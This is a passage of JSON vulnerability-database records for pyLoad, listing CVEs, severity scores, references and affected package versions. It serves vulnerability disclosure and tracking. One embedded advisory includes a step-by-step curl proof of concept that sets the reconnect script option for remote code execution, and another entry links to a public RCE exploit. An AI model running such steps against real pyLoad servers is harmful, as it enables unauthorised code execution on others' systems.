"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-03-30T18:29:03Z/" } ], "url": "https://github.com/pyload/pyload/security/advisories/GHSA-m74m-f7cr-432x" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33992", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33992" }, { "reference_url": "https://github.com/advisories/GHSA-m74m-f7cr-432x", "reference_id": "GHSA-m74m-f7cr-432x", "reference_type": "", "scores": [], "url": "https://github.com/advisories/GHSA-m74m-f7cr-432x" } ], "fixed_packages": [], "aliases": [ "CVE-2026-33992", "GHSA-m74m-f7cr-432x" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-ut9v-xcjn-ukb1" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/46794?format=api", "vulnerability_id": "VCID-vzcg-gg18-9uhg", "summary": "Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')\npyLoad is the free and open-source Download Manager written in pure Python. A log injection vulnerability was identified in `pyload` allowing any unauthenticated actor to inject arbitrary messages into the logs gathered by `pyload`. Forged or otherwise, corrupted log files can be used to cover an attacker’s tracks or even to implicate another party in the commission of a malicious act. This vulnerability has been patched in version 0.5.0b3.dev77.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2024-21645", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.73382", "scoring_system": "epss", "scoring_elements": "0.9882", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2024-21645" }, { "reference_url": "https://github.com/pyload/pyload", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pyload/pyload" }, { "reference_url": "https://github.com/pyload/pyload/commit/4159a1191ec4fe6d927e57a9c4bb8f54e16c381d", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2024-01-17T21:13:17Z/" } ], "url": "https://github.com/pyload/pyload/commit/4159a1191ec4fe6d927e57a9c4bb8f54e16c381d" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2024-21645", "reference_id": "CVE-2024-21645", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-21645" }, { "reference_url": "https://github.com/advisories/GHSA-ghmw-rwh8-6qmr", "reference_id": "GHSA-ghmw-rwh8-6qmr", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-ghmw-rwh8-6qmr" }, { "reference_url": "https://github.com/pyload/pyload/security/advisories/GHSA-ghmw-rwh8-6qmr", "reference_id": "GHSA-ghmw-rwh8-6qmr", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2024-01-17T21:13:17Z/" } ], "url": "https://github.com/pyload/pyload/security/advisories/GHSA-ghmw-rwh8-6qmr" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/38750?format=api", "purl": "pkg:pypi/pyload-ng@0.5.0b3.dev77", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1k5h-nhcv-cke9" }, { "vulnerability": "VCID-3355-ps9v-7ffh" }, { "vulnerability": "VCID-4fna-mzsg-w7d5" }, { "vulnerability": "VCID-6ujx-ntw5-s7dy" }, { "vulnerability": "VCID-73d4-um61-k7ht" }, { "vulnerability": "VCID-9rb6-kh78-sbdf" }, { "vulnerability": "VCID-9u2h-q8gu-t7h4" }, { "vulnerability": "VCID-a7fd-nsys-qub1" }, { "vulnerability": "VCID-bzxw-4smh-6yed" }, { "vulnerability": "VCID-c4n8-pnbr-buce" }, { "vulnerability": "VCID-f95r-tk7k-gufe" }, { "vulnerability": "VCID-f9wx-gf1u-7bgc" }, { "vulnerability": "VCID-h66k-vm3m-c3b6" }, { "vulnerability": "VCID-hkus-pqz4-uyb2" }, { "vulnerability": "VCID-hsc6-6qgc-q3eg" }, { "vulnerability": "VCID-hva8-kb62-rkax" }, { "vulnerability": "VCID-hzu2-r32u-q7c7" }, { "vulnerability": "VCID-jxej-fugb-3ydh" }, { "vulnerability": "VCID-mbkb-u95k-yfgc" }, { "vulnerability": "VCID-nbnk-6g72-3ybk" }, { "vulnerability": "VCID-ng6u-saxg-dbf9" }, { "vulnerability": "VCID-p22h-1rtx-bkcy" }, { "vulnerability": "VCID-qg7b-ayq5-8bax" }, { "vulnerability": "VCID-qmbx-7s8b-4khw" }, { "vulnerability": "VCID-u712-62py-aqgt" }, { "vulnerability": "VCID-ut9v-xcjn-ukb1" }, { "vulnerability": "VCID-vzzm-8en6-fydc" }, { "vulnerability": "VCID-x15r-v69w-yuaj" }, { "vulnerability": "VCID-x1ek-3cgq-skh9" }, { "vulnerability": "VCID-xgcy-vqcp-43dj" }, { "vulnerability": "VCID-xhbh-mwv5-wfgf" }, { "vulnerability": "VCID-xs39-z9t4-wyh9" }, { "vulnerability": "VCID-yk3e-d92p-cubu" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/pyload-ng@0.5.0b3.dev77" } ], "aliases": [ "CVE-2024-21645", "GHSA-ghmw-rwh8-6qmr" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-vzcg-gg18-9uhg" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/57919?format=api", "vulnerability_id": "VCID-vzzm-8en6-fydc", "summary": "Denial-of-Service attack in pyLoad CNL Blueprint using dukpy.evaljs\nThe `jk` parameter is received in pyLoad CNL Blueprint. Due to the lack of `jk` parameter verification, the `jk` parameter input by the user is directly determined as dykpy.evaljs(), resulting in the server CPU being fully occupied and the web-ui becoming unresponsive.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-57751", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00112", "scoring_system": "epss", "scoring_elements": "0.29274", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-57751" }, { "reference_url": "https://github.com/pyload/pyload", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:P" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pyload/pyload" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-57751", "reference_id": "CVE-2025-57751", "reference_type": "", "scores": [ { "value": "7.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:P" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-57751" }, { "reference_url": "https://github.com/advisories/GHSA-9gjj-6gj7-c4wj", "reference_id": "GHSA-9gjj-6gj7-c4wj", "reference_type": "", "scores": [], "url": "https://github.com/advisories/GHSA-9gjj-6gj7-c4wj" }, { "reference_url": "https://github.com/pyload/pyload/security/advisories/GHSA-9gjj-6gj7-c4wj", "reference_id": "GHSA-9gjj-6gj7-c4wj", "reference_type": "", "scores": [ { "value": "7.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:P" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-08-21T18:40:14Z/" } ], "url": "https://github.com/pyload/pyload/security/advisories/GHSA-9gjj-6gj7-c4wj" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/48576?format=api", "purl": "pkg:pypi/pyload-ng@0.5.0b3.dev92", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1k5h-nhcv-cke9" }, { "vulnerability": "VCID-4fna-mzsg-w7d5" }, { "vulnerability": "VCID-6ujx-ntw5-s7dy" }, { "vulnerability": "VCID-73d4-um61-k7ht" }, { "vulnerability": "VCID-9rb6-kh78-sbdf" }, { "vulnerability": "VCID-9u2h-q8gu-t7h4" }, { "vulnerability": "VCID-c4n8-pnbr-buce" }, { "vulnerability": "VCID-h66k-vm3m-c3b6" }, { "vulnerability": "VCID-hkus-pqz4-uyb2" }, { "vulnerability": "VCID-hsc6-6qgc-q3eg" }, { "vulnerability": "VCID-hzu2-r32u-q7c7" }, { "vulnerability": "VCID-jxej-fugb-3ydh" }, { "vulnerability": "VCID-ng6u-saxg-dbf9" }, { "vulnerability": "VCID-p22h-1rtx-bkcy" }, { "vulnerability": "VCID-qg7b-ayq5-8bax" }, { "vulnerability": "VCID-qmbx-7s8b-4khw" }, { "vulnerability": "VCID-ut9v-xcjn-ukb1" }, { "vulnerability": "VCID-x15r-v69w-yuaj" }, { "vulnerability": "VCID-x1ek-3cgq-skh9" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/pyload-ng@0.5.0b3.dev92" } ], "aliases": [ "CVE-2025-57751", "GHSA-9gjj-6gj7-c4wj" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-vzzm-8en6-fydc" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/37276?format=api", "vulnerability_id": "VCID-x15r-v69w-yuaj", "summary": "pyLoad is a free and open-source download manager written in Python. Prior to 0.5.0b3.dev97, the ADMIN_ONLY_CORE_OPTIONS authorization set in set_config_value() uses incorrect option names ssl_cert and ssl_key, while the actual configuration option names are ssl_certfile and ssl_keyfile. This name mismatch causes the admin-only check to always evaluate to False, allowing any user with SETTINGS permission to overwrite the SSL certificate and key file paths. Additionally, the ssl_certchain option was never added to the admin-only set at all. This vulnerability is fixed in 0.5.0b3.dev97.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35586", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00023", "scoring_system": "epss", "scoring_elements": "0.06611", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35586" }, { "reference_url": "https://github.com/pyload/pyload", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pyload/pyload" }, { "reference_url": "https://github.com/pyload/pyload/security/advisories/GHSA-ppvx-rwh9-7rj7", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-07T18:16:06Z/" } ], "url": "https://github.com/pyload/pyload/security/advisories/GHSA-ppvx-rwh9-7rj7" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35586", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35586" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/48581?format=api", "purl": "pkg:pypi/pyload-ng@0.5.0b3.dev97", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1k5h-nhcv-cke9" }, { "vulnerability": "VCID-9u2h-q8gu-t7h4" }, { "vulnerability": "VCID-c4n8-pnbr-buce" }, { "vulnerability": "VCID-h66k-vm3m-c3b6" }, { "vulnerability": "VCID-hzu2-r32u-q7c7" }, { "vulnerability": "VCID-jxej-fugb-3ydh" }, { "vulnerability": "VCID-p22h-1rtx-bkcy" }, { "vulnerability": "VCID-qg7b-ayq5-8bax" }, { "vulnerability": "VCID-qmbx-7s8b-4khw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/pyload-ng@0.5.0b3.dev97" } ], "aliases": [ "CVE-2026-35586", "GHSA-ppvx-rwh9-7rj7", "PYSEC-2026-123" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-x15r-v69w-yuaj" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90795?format=api", "vulnerability_id": "VCID-x1ek-3cgq-skh9", "summary": "pyLoad SETTINGS Permission Users Can Achieve Remote Code Execution via Unrestricted Reconnect Script Configuration\n## Summary\n\nThe `set_config_value()` API endpoint allows users with the non-admin `SETTINGS` permission to modify any configuration option without restriction. The `reconnect.script` config option controls a file path that is passed directly to `subprocess.run()` in the thread manager's reconnect logic. A SETTINGS user can set this to any executable file on the system, achieving Remote Code Execution. The only validation in `set_config_value()` is a hardcoded check for `general.storage_folder` — all other security-critical settings including `reconnect.script` are writable without any allowlist or path restriction.\n\n## Details\n\nThe vulnerability chain spans two components:\n\n**1. Unrestricted config write — `src/pyload/core/api/__init__.py:210-243`**\n\n```python\n@permission(Perms.SETTINGS)\n@post\ndef set_config_value(self, category: str, option: str, value: Any, section: str = \"core\") -> None:\n self.pyload.addon_manager.dispatch_event(\n \"config_changed\", category, option, value, section\n )\n if section == \"core\":\n if category == \"general\" and option == \"storage_folder\":\n # Forbid setting the download folder inside dangerous locations\n # ... validation only for storage_folder ...\n return\n\n self.pyload.config.set(category, option, value) # No validation for any other option\n```\n\nThe `Perms.SETTINGS` permission (value 128) is a non-admin permission flag. The only hardcoded validation is for `general.storage_folder`. The `reconnect.script` option is written directly to config with no path validation, allowlist, or sanitization.\n\n**2. Arbitrary script execution — `src/pyload/core/managers/thread_manager.py:157-199`**\n\n```python\ndef try_reconnect(self):\n if not (\n self.pyload.config.get(\"reconnect\", \"enabled\")\n and self.pyload.api.is_time_reconnect()\n ):\n return False\n\n # ... checks if active downloads want reconnect ...\n\n reconnect_script = self.pyload.config.get(\"reconnect\", \"script\")\n if not os.path.isfile(reconnect_script):\n self.pyload.config.set(\"reconnect\", \"enabled\", False)\n self.pyload.log.warning(self._(\"Reconnect script not found!\"))\n return\n\n # ... reconnect logic ...\n\n try:\n subprocess.run(reconnect_script) # Executes attacker-controlled path\n except Exception:\n # ...\n```\n\nThe `reconnect_script` value comes directly from config. The only check is `os.path.isfile()` — the file must exist but there is no allowlist, no path restriction, and no signature verification.\n\n**3. Attacker also controls timing via same SETTINGS permission**\n\nThe attacker can set `reconnect.enabled=True`, `reconnect.start_time`, and `reconnect.end_time` through the same `set_config_value()` endpoint to control when execution occurs. `toggle_reconnect()` at line 321 requires only `Perms.STATUS` — an even lower privilege.\n\n**4. Additional privilege escalation via config access**\n\nBeyond RCE, the same unrestricted config write allows SETTINGS users to:\n- Read proxy credentials (`proxy.username`/`proxy.password`) in plaintext via `get_config()`\n- Redirect syslog to an attacker-controlled server (`log.syslog_host`/`log.syslog_port`)\n- Disable SSL (`webui.use_ssl=False`), rebind to `0.0.0.0` (`webui.host`)\n- Modify SSL certificate/key paths to enable MITM\n\n## PoC\n\n**Step 1: Set reconnect script to an attacker-controlled executable**\n\nVia API:\n```bash\n# Authenticate and get session (as user with SETTINGS permission)\ncurl -c cookies.txt -X POST 'http://target:8000/api/login' \\\n -d 'username=settingsuser&password=pass123'\n\n# Set reconnect script to a known executable on the system\ncurl -b cookies.txt -X POST 'http://target:8000/api/set_config_value' \\\n -d 'category=reconnect&option=script&value=/tmp/exploit.sh§ion=core'\n```\n\nVia Web UI:\n```bash\ncurl -b cookies.txt -X POST 'http://target:8000/json/save_config?category=core' \\\n -d 'reconnect|script=/tmp/exploit.sh&reconnect|enabled=True'\n```\n\n**Step 2: Enable reconnect and set timing window**\n\n```bash\ncurl -b cookies.txt -X POST 'http://target:8000/api/set_config_value' \\\n -d 'category=reconnect&option=enabled&value=True§ion=core'\n\ncurl -b cookies.txt -X POST 'http://target:8000/api/set_config_value' \\\n -d 'category=reconnect&option=start_time&value=00:00§ion=core'\n\ncurl -b cookies.txt -X POST 'http://target:8000/api/set_config_value' \\\n -d 'category=reconnect&option=end_time&value=23:59§ion=core'\n```\n\n**Step 3: Script executes when thread manager calls `try_reconnect()`**\n\nThe thread manager's `run()` method (called repeatedly by the core loop) invokes `try_reconnect()`, which calls `subprocess.run(reconnect_script)` at `thread_manager.py:199`.\n\n**Note on exploitation constraints:** The file at the target path must exist (`os.path.isfile()` check) and be executable. With `shell=False` (subprocess.run default), no arguments are passed. If the attacker also has `ADD` permission (common for non-admin users), they can use pyLoad to download an archive containing an executable script, which may retain execute permissions after extraction.\n\n## Impact\n\n- **Remote Code Execution**: A non-admin user with SETTINGS permission can execute arbitrary programs on the server as the pyLoad process user\n- **Privilege escalation**: The SETTINGS permission is described as \"can access settings\" — granting it is not expected to grant arbitrary code execution capability\n- **Credential exposure**: SETTINGS users can read proxy credentials, SSL key paths, and other sensitive config values via `get_config()`\n- **Network reconfiguration**: SETTINGS users can disable SSL, change bind address, redirect logging, and modify other security-critical network settings\n\n## Recommended Fix\n\nAdd an allowlist or category-level restriction in `set_config_value()` that prevents non-admin users from modifying security-critical options:\n\n```python\n# In set_config_value(), after the storage_folder check:\nADMIN_ONLY_OPTIONS = {\n (\"reconnect\", \"script\"),\n (\"webui\", \"host\"),\n (\"webui\", \"use_ssl\"),\n (\"webui\", \"ssl_cert\"),\n (\"webui\", \"ssl_key\"),\n (\"log\", \"syslog_host\"),\n (\"log\", \"syslog_port\"),\n (\"proxy\", \"username\"),\n (\"proxy\", \"password\"),\n}\n\nif section == \"core\" and (category, option) in ADMIN_ONLY_OPTIONS:\n # Require ADMIN role for security-critical settings\n if not self.pyload.api.user_data.get(\"role\") == Role.ADMIN:\n raise PermissionError(f\"Admin role required to modify {category}.{option}\")\n```\n\nAdditionally, consider validating the `reconnect.script` path against an allowlist of directories or requiring admin approval for script path changes.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-33509", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00113", "scoring_system": "epss", "scoring_elements": "0.29596", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-33509" }, { "reference_url": "https://github.com/pyload/pyload", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pyload/pyload" }, { "reference_url": "https://github.com/pyload/pyload/commit/f5e284fcdfeaf08436bb03e5fcf697aaac659d8b", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pyload/pyload/commit/f5e284fcdfeaf08436bb03e5fcf697aaac659d8b" }, { "reference_url": "https://github.com/pyload/pyload/security/advisories/GHSA-r7mc-x6x7-cqxx", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-03-26T19:33:56Z/" } ], "url": "https://github.com/pyload/pyload/security/advisories/GHSA-r7mc-x6x7-cqxx" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33509", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33509" } ], "fixed_packages": [], "aliases": [ "CVE-2026-33509", "GHSA-r7mc-x6x7-cqxx" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-x1ek-3cgq-skh9" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/56093?format=api", "vulnerability_id": "VCID-xgcy-vqcp-43dj", "summary": "Duplicate Advisory: pyload-ng vulnerable to RCE with js2py sandbox escape\n## Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-r9pp-r4xf-597r. This link is maintained to preserve external references.\n\n## Original Description\nAn issue in pyload-ng v0.5.0b3.dev85 running under python3.11 or below allows attackers to execute arbitrary code via a crafted HTTP request.", "references": [ { "reference_url": "https://github.com/Marven11/CVE-2024-39205-Pyload-RCE/tree/main", "reference_id": "", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/Marven11/CVE-2024-39205-Pyload-RCE/tree/main" }, { "reference_url": "https://github.com/pyload/pyload", "reference_id": "", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pyload/pyload" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2024-39205", "reference_id": "CVE-2024-39205", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-39205" }, { "reference_url": "https://github.com/advisories/GHSA-25pw-q952-x37g", "reference_id": "GHSA-25pw-q952-x37g", "reference_type": "", "scores": [], "url": "https://github.com/advisories/GHSA-25pw-q952-x37g" }, { "reference_url": "https://github.com/pyload/pyload/security/advisories/GHSA-r9pp-r4xf-597r", "reference_id": "GHSA-r9pp-r4xf-597r", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pyload/pyload/security/advisories/GHSA-r9pp-r4xf-597r" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/48571?format=api", "purl": "pkg:pypi/pyload-ng@0.5.0b3.dev87", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1k5h-nhcv-cke9" }, { "vulnerability": "VCID-4fna-mzsg-w7d5" }, { "vulnerability": "VCID-6ujx-ntw5-s7dy" }, { "vulnerability": "VCID-73d4-um61-k7ht" }, { "vulnerability": "VCID-9rb6-kh78-sbdf" }, { "vulnerability": "VCID-9u2h-q8gu-t7h4" }, { "vulnerability": "VCID-bzxw-4smh-6yed" }, { "vulnerability": "VCID-c4n8-pnbr-buce" }, { "vulnerability": "VCID-f95r-tk7k-gufe" }, { "vulnerability": "VCID-f9wx-gf1u-7bgc" }, { "vulnerability": "VCID-h66k-vm3m-c3b6" }, { "vulnerability": "VCID-hkus-pqz4-uyb2" }, { "vulnerability": "VCID-hsc6-6qgc-q3eg" }, { "vulnerability": "VCID-hzu2-r32u-q7c7" }, { "vulnerability": "VCID-jxej-fugb-3ydh" }, { "vulnerability": "VCID-mbkb-u95k-yfgc" }, { "vulnerability": "VCID-ng6u-saxg-dbf9" }, { "vulnerability": "VCID-p22h-1rtx-bkcy" }, { "vulnerability": "VCID-qg7b-ayq5-8bax" }, { "vulnerability": "VCID-qmbx-7s8b-4khw" }, { "vulnerability": "VCID-u712-62py-aqgt" }, { "vulnerability": "VCID-ut9v-xcjn-ukb1" }, { "vulnerability": "VCID-vzzm-8en6-fydc" }, { "vulnerability": "VCID-x15r-v69w-yuaj" }, { "vulnerability": "VCID-x1ek-3cgq-skh9" }, { "vulnerability": "VCID-yk3e-d92p-cubu" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/pyload-ng@0.5.0b3.dev87" } ], "aliases": [ "GHSA-25pw-q952-x37g" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-xgcy-vqcp-43dj" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/57593?format=api", "vulnerability_id": "VCID-xhbh-mwv5-wfgf", "summary": "Duplicate Advisory: GHSA-x698-5hjm-w2m5\n### Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-x698-5hjm-w2m5. This link is maintained to preserve external references.\n\n### Original Description\nAny unauthenticated attacker can bypass the localhost \nrestrictions posed by the application and utilize this to create \narbitrary packages", "references": [ { "reference_url": "https://github.com/pyload/pyload", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pyload/pyload" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7346", "reference_id": "CVE-2025-7346", "reference_type": "", "scores": [ { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7346" }, { "reference_url": "https://github.com/advisories/GHSA-2wcm-vx67-3x4q", "reference_id": "GHSA-2wcm-vx67-3x4q", "reference_type": "", "scores": [], "url": "https://github.com/advisories/GHSA-2wcm-vx67-3x4q" }, { "reference_url": "https://github.com/pyload/pyload/security/advisories/GHSA-x698-5hjm-w2m5", "reference_id": "GHSA-x698-5hjm-w2m5", "reference_type": "", "scores": [ { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pyload/pyload/security/advisories/GHSA-x698-5hjm-w2m5" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/38751?format=api", "purl": "pkg:pypi/pyload-ng@0.5.0b3.dev78", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1k5h-nhcv-cke9" }, { "vulnerability": "VCID-3355-ps9v-7ffh" }, { "vulnerability": "VCID-4fna-mzsg-w7d5" }, { "vulnerability": 